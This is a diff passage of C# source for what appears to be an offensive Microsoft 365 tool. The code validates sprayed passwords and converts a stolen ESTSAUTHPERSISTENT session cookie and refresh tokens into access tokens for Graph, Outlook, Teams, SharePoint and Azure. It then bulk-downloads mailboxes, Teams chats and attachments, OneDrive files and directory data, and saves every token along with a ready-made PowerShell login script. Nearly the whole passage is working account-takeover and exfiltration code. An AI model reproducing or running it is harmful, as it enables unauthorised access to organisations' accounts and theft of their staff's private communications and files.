+				_databaseHandler.WriteLog(new Log("SPRAY", $"Third party authentication detected - exfil will not work, sorry!\nThird-Party Authentication url: " + getUserRealmResult.ThirdPartyAuthUrl));
+				Environment.Exit(0);
+			}
+
+
+			//Check if this client has ADFS
+			if (getUserRealmResult.Adfs && !_globalProperties.AADSSO)
+			{
+				_databaseHandler.WriteLog(new Log("SPRAY", $"ADFS federation detected , exfil will not work"));
+				Environment.Exit(0);
+
+			}
+
+			var randomResource = Helpers.Generic.RandomO365Res();
+
+			var sprayAttempt = new SprayAttempt()
+			{
+				Username = username,
+				Password = password,
+				//ComboHash = "",
+				FireProxURL = _globalProperties.GetBaseUrl(),
+				FireProxRegion = "NONE", //fireProxObject.Item2.Region,
+				ResourceClientId = randomResource.clientId,
+				ResourceUri = randomResource.Uri,
+				AADSSO = false, //_globalProperties.AADSSO,
+				ADFS = false, //getUserRealmResult.Adfs
+			};
+
+
+			//Attempt to login once in order to confirm creds are infact valid, as well as parse the information into the database
+			var sprayedAttempt = await Spray.SprayAttemptWrap(sprayAttempt, _globalProperties, _databaseHandler, getUserRealmResult);
+
+			if (sprayedAttempt.Valid)
+				await PrepareExfil(sprayedAttempt, exfilOptions, true);
+
+
+			return;
+
+		}
+		private static async Task RefreshExfilAccountAsync(string outpath, BearerTokenResp inputTokenData, ExifilOptions exifilOptions, MSOLHandler msolHandler, string clientId = "1fec8e78-bce4-4aaf-ab1b-5451cc387264")
+		{
+			//Extract the username from the initial JWT token
+			string username = Helpers.Generic.GetUsername(inputTokenData.access_token);
+			//Create the output path based on this
+			var baseUserOutPath = Path.Combine(outpath, Helpers.Generic.MakeValidFileName(username));
+			Directory.CreateDirectory(baseUserOutPath);
+
+			//Declare a bunch of empty tokens objects
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) companySharePointToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) personalOneDriveToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) outlookToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) msGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) adGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) teamsToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) azurePSToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+
+			//If we want to exfil -aad
+			if (exifilOptions.AAD)
+			{
+
+				if (adGraphToken.bearerToken?.access_token == null)
+					adGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.windows.net", clientId: clientId);
+
+				if (msGraphToken.bearerToken?.access_token == null)
+					msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
+
+				if (msGraphToken.bearerToken?.access_token != null)
+					await MsGraphExfilAsync(msGraphToken.bearerToken, baseUserOutPath);
+
+				if (adGraphToken.bearerToken?.access_token != null)
+					await AdGraphExfilAsync(adGraphToken.bearerToken, baseUserOutPath);
+
+
+			}
+
+			if (exifilOptions.OWA)
+			{
+				//Get the tokens neede if we don't already have them
+				if (outlookToken.bearerToken?.access_token == null)
+					outlookToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://outlook.office365.com", clientId: clientId);
+
+				//Did we get them, if so let's exfil!
+				if (outlookToken.bearerToken?.access_token != null)
+					await OWAExfilAsync(outlookToken.bearerToken, baseUserOutPath);
+
+			}
+
+			if (exifilOptions.Teams)
+			{
+				//In order to exfilrate Teams, we need to know the sharepoint personal and company site
+				//We can get this using either the Teams API
+
+				//Check if we have/can get an teams token
+				if (teamsToken.bearerToken?.access_token == null)
+					teamsToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://api.spaces.skype.com", clientId: clientId);
+
+				//Do we have a teams token?
+				if (teamsToken.bearerToken != null)
+				{
+
+					TeamsHandler teamsHandler = new TeamsHandler(teamsToken.bearerToken, _globalProperties);
+
+					List<GetTenatsResp> tenantInfo = await teamsHandler.GetTenantsInfo();
+					FilesAvailabilityResp sharePointInfo = await teamsHandler.GetSharePointInfo();
+
+
+					File.WriteAllText(Path.Combine(baseUserOutPath, "Tenant.json"), JsonConvert.SerializeObject(tenantInfo, Formatting.Indented));
+					File.WriteAllText(Path.Combine(baseUserOutPath, "SharePoint.json"), JsonConvert.SerializeObject(sharePointInfo, Formatting.Indented));
+
+					if (sharePointInfo?.personalRootFolderUrl != null)
+					{
+
+						//Get the tokens neede if we don't already have them
+						if (companySharePointToken.bearerToken?.access_token == null)
+							companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), sharePointInfo.personalRootFolderUrl.Replace("-my", ""), clientId: clientId);
+						//Get the tokens neede if we don't already have them
+						if (personalOneDriveToken.bearerToken?.access_token == null)
+							personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), sharePointInfo.personalRootFolderUrl, clientId: clientId);
+
+						//Did we get them, if so let's exfil!
+						if (teamsToken.bearerToken?.access_token != null && personalOneDriveToken.bearerToken?.access_token != null)
+							await TeamsExfilAsync(teamsToken.bearerToken, personalOneDriveToken.bearerToken, companySharePointToken.bearerToken, baseUserOutPath);
+
+					}
+
+
+
+				}
+			}
+
+			if (exifilOptions.Tokens)
+			{
+				if (msGraphToken.bearerToken?.access_token == null)
+					msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
+
+				//We need either a teams token or Graph API token in order to get the SharePoint URL
+				if (msGraphToken.bearerToken != null)
+				{
+					var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, username, _globalProperties, _databaseHandler);
+
+					//Pretty sure this can be done without Auth
+					SharePointSite siteRoot = await oneDriveHandler.GetSiteRoot();
+
+					if (siteRoot != null)
+					{
+
+
+						companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl.Replace("-my", ""), clientId: clientId);
+						personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl, clientId: clientId);
+					}
+				}
+
+
+				outlookToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://outlook.office365.com", clientId: clientId);
+
+				azurePSToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://management.core.windows.net/", clientId: clientId);
+
+				msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
+
+				adGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.windows.net", clientId: clientId);
+
+
+				var bearerTokensOutPath = Path.Combine(baseUserOutPath, @"Tokens");
+				Directory.CreateDirectory(bearerTokensOutPath);
+
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "TeamsToken.txt"), JsonConvert.SerializeObject(inputTokenData, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "AdGraphToken.txt"), JsonConvert.SerializeObject(adGraphToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "MsGraphToken.txt"), JsonConvert.SerializeObject(msGraphToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "OutlookToken.txt"), JsonConvert.SerializeObject(outlookToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "OneDriveToken.txt"), JsonConvert.SerializeObject(personalOneDriveToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "SharePointToken.txt"), JsonConvert.SerializeObject(companySharePointToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "AzureCLIToken.txt"), JsonConvert.SerializeObject(azurePSToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "loginAAD.ps1"), $"$AadToken=\"{adGraphToken.bearerToken?.access_token}\"\n$MsgToken=\"{msGraphToken.bearerToken?.access_token}\"\nConnect-MsolService -AdGraphAccessToken $AadToken -MsGraphAccessToken $MsgToken -AzureEnvironment 'AzureCloud'");
+
+			}
+
+
+
+
+			if (exifilOptions.OneDrive)
+			{
+
+
+				if (msGraphToken.bearerToken?.access_token == null)
+					msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
+
+				//We need either a teams token or Graph API token in order to get the SharePoint URL
+				if (msGraphToken.bearerToken != null)
+				{
+					var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, username, _globalProperties, _databaseHandler);
+
+
+					SharePointSite siteRoot = await oneDriveHandler.GetSiteRoot();
+
+					//Get the tokens neede if we don't already have them
+					if (companySharePointToken.bearerToken?.access_token == null)
+						companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl.Replace("-my", ""), clientId: clientId);
+
+					if (personalOneDriveToken.bearerToken?.access_token == null)
+						personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl, clientId: clientId);
+
+
+					//Did we get them, if so let's exfil!
+					if (companySharePointToken.bearerToken != null && inputTokenData != null)
+						await OneDriveExfilAsync(companySharePointToken.bearerToken, msGraphToken.bearerToken, inputTokenData, personalOneDriveToken.bearerToken, oneDriveHandler, baseUserOutPath);
+				}
+
+			}
+		}
+		private static async Task CookieExfilAccountAsync(string outpath, List<CookieObject> cookieObjects, ExifilOptions exifilOptions, MSOLHandler msolHandler)
+		{
+			//Check to confirm that we have the coookies we need
+			if (!cookieObjects.Select(cookie => cookie.name).Contains("ESTSAUTHPERSISTENT"))
+			{
+				Console.WriteLine("[+] Could not found required ESTSAUTHPERSISTENT cookie in dump, user might not be logged into Microsoft");
+			}
+
+			//Extract the information we need from the dump
+			var tokenDict = new List<(string username, PulledTokens pulledToken)>() { };
+			JwtSecurityTokenHandler jwsSecurityHandler = new JwtSecurityTokenHandler();
+
+			//Look for accessTokens inside cookie objects and add them to the database!
+			//TODO: Make sure we do not add tokens that are already in the database, and that the tokens we add are infact valid!
+
+			foreach (var possibleToken in cookieObjects)
+			{
+				var regeexData = Regex.Match(possibleToken.value, @"(ey[a-zA-Z0-9_=]+)\.([a-zA-Z0-9_=]+)\.([a-zA-Z0-9_\-\+\/=]*)");
+				if (regeexData.Success)
+				{
+					string token = regeexData.Value;
+					JwtSecurityToken jwtSecurityToken = jwsSecurityHandler.ReadJwtToken(token);
+
+					if (Helpers.Generic.hasValidRecUri(jwtSecurityToken))
+					{
+						PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecurityToken);
+						var tempTokenDictObject = (Helpers.Generic.GetUsername(jwtSecurityToken.RawData), parsedTokenObject);
+						if (!tokenDict.Contains(tempTokenDictObject))
+						{
+							tokenDict.Add(tempTokenDictObject);
+
+							//Add a check to avoid adding tokens like crazy
+							_databaseHandler.WriteToken(parsedTokenObject);
+						}
+
+					}
+				}
+			}
+
+			//We need an tenantId!
+			string tenantId = "";
+			string userName = "";
+
+			//If this fails, we could attempt to get the tenantId some other way? Maybe a public enum method or so
+			if (tokenDict.Count() > 0)
+			{
+				var firstToken = ((BearerTokenResp)tokenDict.FirstOrDefault().pulledToken).access_token;
+				tenantId = Helpers.Generic.GetTenantId(firstToken);
+				userName = Helpers.Generic.GetUsername(firstToken);
+			}
+			else
+			{
+				Console.WriteLine("[!] Failed to parse JWT and get TenantId automatically, what is the targets email?");
+				Console.WriteLine("#>");
+				string targetEmail = Console.ReadLine();
+				try
+				{
+					string domain = targetEmail.Trim().Split("@")[1];
+					GetOpenIdConfigResp openIdConfig = await msolHandler.GetOpenIdConfig(domain);
+					tenantId = openIdConfig.authorization_endpoint.Split("/")[3];
+				}
+				catch (Exception)
+				{
+					Console.WriteLine("[!] Failed to retrive TenantID, cannot continue without");
+					Environment.Exit(0);
+				}
+
+
+			}
+			string cookie = "ESTSAUTHPERSISTENT=" + cookieObjects.Where(x => x.name.Equals("ESTSAUTHPERSISTENT")).FirstOrDefault()?.value;
+			if (string.IsNullOrEmpty(cookie))
+			{
+				Console.WriteLine("[!] ESTSAUTHPERSISTENT cookie was empty!");
+				Environment.Exit(0);
+			}
+
+			//TODO: Create dummy user to be added into the validUsers database so we can pick these at an later stage
+			//Get the team's access token
+			BearerTokenResp teamsToken = new BearerTokenResp() { };
+			try
+			{
+				var attempSingleSignOn = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, targetResource: "https://api.spaces.skype.com", checkCache: true);
+				//Let's try to abuse single sign on
+				teamsToken = attempSingleSignOn.bearerToken;
+			}
+			catch (Exception ex)
+			{
+				//TODO: That failed, check if we have it cached
+			}
+			TeamsHandler teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
+
+			List<GetTenatsResp> tenantInfo = await teamsHandler.GetTenantsInfo();
+			FilesAvailabilityResp sharePointInfo = await teamsHandler.GetSharePointInfo();
+
+
+			var baseUserOutPath = Path.Combine(outpath, Helpers.Generic.MakeValidFileName(userName));
+			Directory.CreateDirectory(baseUserOutPath);
+
+			File.WriteAllText(Path.Combine(baseUserOutPath, "Tenant.json"), JsonConvert.SerializeObject(tenantInfo, Formatting.Indented));
+			File.WriteAllText(Path.Combine(baseUserOutPath, "SharePoint.json"), JsonConvert.SerializeObject(sharePointInfo, Formatting.Indented));
+
+
+			string companySharePointUrl = "";
+			string personalSharePointUrl = "";
+
+			if (sharePointInfo?.personalRootFolderUrl == null)
+			{
+				_databaseHandler.WriteLog(new Log("EXFIL", $"User has not been configured / licensed for o365, skipping OneDrive/SharePoint", "") { }, true);
+
+				sharePointInfo = new FilesAvailabilityResp();
+				sharePointInfo.personalRootFolderUrl = "invalid";
+				exifilOptions.OneDrive = false;
+
+			}
+			else
+			{
+				companySharePointUrl = sharePointInfo.personalRootFolderUrl.Replace("-my", "");
+				personalSharePointUrl = sharePointInfo.personalRootFolderUrl;
+			}
+
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) companySharePointToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) personalOneDriveToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) outlookToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) msGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+			(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) adGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
+
+			var cookieBaseUrl = _globalProperties.GetBaseUrl().Replace("/common/oauth2/token", "");
+
+			if (exifilOptions.Tokens)
+			{
+
+				companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: companySharePointUrl);
+
+				personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: personalSharePointUrl);
+
+				outlookToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://outlook.office365.com");
+
+				msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://graph.microsoft.com");
+
+				adGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://graph.windows.net");
+
+
+				var bearerTokensOutPath = Path.Combine(baseUserOutPath, @"Tokens");
+				Directory.CreateDirectory(bearerTokensOutPath);
+
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "TeamsToken.txt"), JsonConvert.SerializeObject(teamsToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "AdGraphToken.txt"), JsonConvert.SerializeObject(adGraphToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "MsGraphToken.txt"), JsonConvert.SerializeObject(msGraphToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "OutlookToken.txt"), JsonConvert.SerializeObject(outlookToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "OneDriveToken.txt"), JsonConvert.SerializeObject(personalOneDriveToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "SharePointToken.txt"), JsonConvert.SerializeObject(companySharePointToken.bearerToken, Formatting.Indented));
+				File.WriteAllText(Path.Combine(bearerTokensOutPath, "loginAAD.ps1"), $"$AadToken=\"{adGraphToken.bearerToken.access_token}\"\n$MsgToken=\"{msGraphToken.bearerToken.access_token}\"\nConnect-MsolService -AdGraphAccessToken $AadToken -MsGraphAccessToken $MsgToken -AzureEnvironment 'AzureCloud'");
+
+			}
+
+			if (exifilOptions.Teams)
+			{
+				//Get the tokens neede if we don't already have them
+				if (personalOneDriveToken.bearerToken?.access_token == null)
+					personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, personalSharePointUrl);
+
+
+				if (companySharePointToken.bearerToken?.access_token == null)
+					companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, companySharePointUrl);
+
+				//Did we get them, if so let's exfil!
+				if (teamsToken?.access_token != null && personalOneDriveToken.bearerToken?.access_token != null)
+					await TeamsExfilAsync(teamsToken, personalOneDriveToken.bearerToken, companySharePointToken.bearerToken, baseUserOutPath);
+
+
+
+
+			}
+			if (exifilOptions.AAD)
+			{
+				//Get the tokens needed if we don't already have them
+				if (adGraphToken.bearerToken?.access_token == null)
+					adGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.windows.net");
+
+				if (msGraphToken.bearerToken?.access_token == null)
+					msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.microsoft.com");
+
+
+				//Did we get them, if so let's exfil!
+				if (adGraphToken.bearerToken?.access_token != null)
+					await AdGraphExfilAsync(adGraphToken.bearerToken, baseUserOutPath);
+
+				if (msGraphToken.bearerToken?.access_token != null)
+					await MsGraphExfilAsync(msGraphToken.bearerToken, baseUserOutPath);
+			}
+
+			if (exifilOptions.OWA)
+			{
+				//Get the tokens neede if we don't already have them
+				if (outlookToken.bearerToken?.access_token == null)
+					outlookToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://outlook.office365.com");
+
+				//Did we get them, if so let's exfil!
+				if (outlookToken.bearerToken?.access_token != null)
+					await OWAExfilAsync(outlookToken.bearerToken, baseUserOutPath);
+
+				// File.WriteAllText(Path.Combine(outlookOutPath, "Emails.json"), JsonConvert.SerializeObject(allEmails, Formatting.Indented));
+			}
+
+
+
+			if (exifilOptions.OneDrive)
+			{
+
+				//Get the tokens neede if we don't already have them
+				if (companySharePointToken.bearerToken?.access_token == null)
+					companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, companySharePointUrl);
+
+				if (personalOneDriveToken.bearerToken?.access_token == null)
+					personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, personalSharePointUrl);
+
+				if (msGraphToken.bearerToken?.access_token == null)
+					msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.microsoft.com");
+
+				var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, userName, _globalProperties, _databaseHandler);
+				//Did we get them, if so let's exfil!
+				if (msGraphToken.bearerToken != null && companySharePointToken.bearerToken != null && cookie != null)
+					await OneDriveExfilAsync(companySharePointToken.bearerToken, msGraphToken.bearerToken, teamsToken, personalOneDriveToken.bearerToken, oneDriveHandler, baseUserOutPath);
+
+			}
+
+		}
+
+
+		#region baseExfilFunctions
+		private static async Task OneDriveExfilAsync(BearerTokenResp companySharePointToken, BearerTokenResp msGraphToken, BearerTokenResp teamsToken, BearerTokenResp personalSharePointToken, OneDriveHandler oneDriveGrapHandler, string outpath)
+		{
+			outpath = Path.Combine(outpath, "OneDrive");
+			var username = Helpers.Generic.GetUsername(teamsToken.access_token);
+			var sharePointHandler = new SharePointHandler(companySharePointToken, username, _globalProperties, _databaseHandler);
+			var personalSharePointHandler = new SharePointHandler(personalSharePointToken, username, _globalProperties, _databaseHandler);
+
+			var teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
+
+
+			_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating shared files from OneDrive", "") { }, true);
+			await oneDriveGrapHandler.GetShared(outpath);
+
+
+			_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating the entire personal OneDrive", "") { }, true);
+			await oneDriveGrapHandler.DumpPersonalOneDrive(outpath);
+
+
+			TeamsFileResp recentFiles = await teamsHandler.GetRecentFiles("EXFIL");
+
+			if (recentFiles != null)
+			{
+				_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating {recentFiles.value.Length} recent files accessible by user", "") { }, true);
+
+				await sharePointHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
+
+				await oneDriveGrapHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
+
+				await personalSharePointHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
+			}
+
+		}
+		private static async Task TeamsExfilAsync(BearerTokenResp teamsToken, BearerTokenResp oneDriveToken, BearerTokenResp sharePointToken, string outpath)
+		{
+
+			outpath = Path.Combine(outpath, "Teams");
+			var userId = Helpers.Generic.GetUserId(teamsToken.access_token);
+			var username = Helpers.Generic.GetUsername(teamsToken.access_token);
+			var displayName = Helpers.Generic.GetDisplayName(teamsToken.access_token);
+
+			var teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
+
+			_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating recently used contacts", "") { }, true);
+			var contactListLogsOutPath = Path.Combine(outpath, "Contactlist");
+			Directory.CreateDirectory(contactListLogsOutPath);
+
+			var contactsInfo = await teamsHandler.GetWorkingWithList(userId);
+			File.WriteAllText(Path.Combine(contactListLogsOutPath, "Contacts.json"), JsonConvert.SerializeObject(contactsInfo, Formatting.Indented));
+
+
+			//We need a skype token to get other stuff
+			(SkypeTokenResp skypeTokenResp, SkypeErrorRespons skypeErrorRespons) getSkypeToken = await teamsHandler.SetSkypeToken();
+			if (getSkypeToken.skypeErrorRespons != null)
+				_databaseHandler.WriteLog(new Log("ENUM", $"Error getting Skype token: {getSkypeToken.skypeErrorRespons.message}", ""));
+
+
+
+
+			var attachmentsLogsOutPath = Path.Combine(outpath, "Attachments");
+			Directory.CreateDirectory(attachmentsLogsOutPath);
+
+			UserConversationsResp chatConversations = await teamsHandler.GetConversations();
+
+			//Check if we have any conversations to look at
+			if (chatConversations != null)
+			{
+				_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating Teams chat logs and attachments ", "") { }, true);
+
+				List<Conversations> conversationList = new List<Conversations>() { };
+
+				//Setup the progressBar
+				int conversationCount = 0;
+				int totalConversationCount = chatConversations.conversations.Count();
+				using (var progress = new ProgressBar())
+				{
+					await chatConversations.conversations.ParallelForEachAsync(
+					async conversation =>
+					{
+						//Get the chat logs for the conversation
+						ChatLogResp chatsLogs = await teamsHandler.GetChatLogs(conversation);
+						//If no empty
+						if (chatsLogs.messages != null)
+						{
+							//Parse it into a cleaner format
+							Conversations parsedConversation = new Conversations(chatsLogs, conversation);
+							conversationList.Add(parsedConversation);
+
+							//for each chat message in the current conversation, where there is attachements
+							foreach (ChatMessages chatMsg in parsedConversation.chatMessagesArray.Where(x => x.Properties?.files != null))
+							{
+								//each attachment file data
+								foreach (FileData fileObject in chatMsg.FileObject)
+								{
+									try
+									{
+										/*
                                         * The files attached with Teams are eiter hosted in the user personal oneDrive (Personal Sharepoint), or company SharePoint
                                         * Identify if we can fetch the resource based on what
                                         */
 
-                                        //If we have atleast one accessToken for each
-                                        if (oneDriveToken.access_token != null || sharePointToken.access_token != null)
-                                        {
-                                            using (var httpClient = new HttpClient())
-                                            {
-
-                                                //We need to look at the baseURL to determine what client to
-                                                var url = @$"{fileObject.baseUrl}/_api/web/GetFileById('{fileObject.id}')/$value";
+										//If we have atleast one accessToken for each
+										if (oneDriveToken.access_token != null || sharePointToken.access_token != null)
+										{
+											using (var httpClient = new HttpClient())
+											{
+
+												//We need to look at the baseURL to determine what client to
+												var url = @$"{fileObject.baseUrl}/_api/web/GetFileById('{fileObject.id}')/$value";
 
-                                                var httpReq = new HttpRequestMessage(HttpMethod.Get, url);
-                                                httpReq.Headers.Add("User-Agent", _globalProperties.TeamFiltrationConfig.UserAgent);
+												var httpReq = new HttpRequestMessage(HttpMethod.Get, url);
+												httpReq.Headers.Add("User-Agent", _globalProperties.TeamFiltrationConfig.UserAgent);
 
-                                                //TODO: Add error handling for this
-                                                if (Helpers.Generic.getTokenResource(sharePointToken.access_token).Host == new Uri(fileObject.baseUrl).Host)
-                                                    httpReq.Headers.Add("Authorization", $"Bearer {sharePointToken.access_token}");
-                                                else
-                                                    httpReq.Headers.Add("Authorization", $"Bearer {oneDriveToken.access_token}");
+												//TODO: Add error handling for this
+												if (Helpers.Generic.getTokenResource(sharePointToken.access_token).Host == new Uri(fileObject.baseUrl).Host)
+													httpReq.Headers.Add("Authorization", $"Bearer {sharePointToken.access_token}");
+												else
+													httpReq.Headers.Add("Authorization", $"Bearer {oneDriveToken.access_token}");
 
-                                                var oneDriveReq = await httpClient.SendAsync(httpReq);
+												var oneDriveReq = await httpClient.SendAsync(httpReq);
 
-                                                if (oneDriveReq.IsSuccessStatusCode)
-                                                {
-                                                    var rawData = await oneDriveReq.Content.ReadAsByteArrayAsync();
-                                                    if (rawData.Length > 0)
-                                                        File.WriteAllBytes(Path.Combine(attachmentsLogsOutPath, fileObject.fileName), rawData);
-                                                }
+												if (oneDriveReq.IsSuccessStatusCode)
+												{
+													var rawData = await oneDriveReq.Content.ReadAsByteArrayAsync();
+													if (rawData.Length > 0)
+														File.WriteAllBytes(Path.Combine(attachmentsLogsOutPath, fileObject.fileName), rawData);
+												}
 
 
-                                            }
-                                        }
-                                    }
-                                    catch (Exception ex)
-                                    {
+											}
+										}
+									}
+									catch (Exception ex)
+									{
 
-                                    }
+									}
 
-                                }
+								}
 
-                            }
-                        }
-                        conversationCount++;
-                        progress.Report((double)conversationCount / totalConversationCount);
-                    }, maxDegreeOfParallelism: 10);
-                }
+							}
+						}
+						conversationCount++;
+						progress.Report((double)conversationCount / totalConversationCount);
+					}, maxDegreeOfParallelism: 10);
+				}
 
-                _databaseHandler.WriteLog(new Log("EXFIL", $"Parsing conversations", "") { }, true);
-                var conversationLogsOutPath = Path.Combine(outpath, "Conversations");
-                Directory.CreateDirectory(conversationLogsOutPath);
+				_databaseHandler.WriteLog(new Log("EXFIL", $"Parsing conversations", "") { }, true);
+				var conversationLogsOutPath = Path.Combine(outpath, "Conversations");
+				Directory.CreateDirectory(conversationLogsOutPath);
 
-                //Add progress bar
-                int praseconversationCount = 0;
-                int parseTotalConversationCount = conversationList.Count();
-                using (var parseProgress = new ProgressBar())
-                {
-                    foreach (var conversationObject in conversationList.Where(x => x.chatMessagesArray.Count() > 0))
-                    {
-                        //This method removes junk chat messages
-                        var convSimple = (ConversationsSimple)(conversationObject, contactsInfo);
+				//Add progress bar
+				int praseconversationCount = 0;
+				int parseTotalConversationCount = conversationList.Count();
+				using (var parseProgress = new ProgressBar())
+				{
+					foreach (var conversationObject in conversationList.Where(x => x.chatMessagesArray.Count() > 0))
+					{
+						//This method removes junk chat messages
+						var convSimple = (ConversationsSimple)(conversationObject, contactsInfo);
 
-                        if (convSimple.Messages.Count() > 0)
-                        {
-                            File.WriteAllText(Path.Combine(conversationLogsOutPath, Helpers.Generic.StringToGUID(conversationObject.Id) + ".txt"),
-                                JsonConvert.SerializeObject(convSimple, Formatting.Indented));
+						if (convSimple.Messages.Count() > 0)
+						{
+							File.WriteAllText(Path.Combine(conversationLogsOutPath, Helpers.Generic.StringToGUID(conversationObject.Id) + ".txt"),
+								JsonConvert.SerializeObject(convSimple, Formatting.Indented));
 
 
 
-                            var chatMessage = new HTMLChat(displayName, conversationObject.Title);
-                            string filename = !string.IsNullOrEmpty(conversationObject.Title) ? Helpers.Generic.MakeValidFileName(conversationObject.Title).Replace(" ", "_").Replace("@", "_") : Helpers.Generic.StringToGUID(conversationObject.Id).ToString();
-                            File.WriteAllText(Path.Combine(conversationLogsOutPath, filename + ".html"), chatMessage.GenerateChat(convSimple));
-                        }
-                        praseconversationCount++;
-                        parseProgress.Report((double)praseconversationCount / parseTotalConversationCount);
-                    }
-                }
+							var chatMessage = new HTMLChat(displayName, conversationObject.Title);
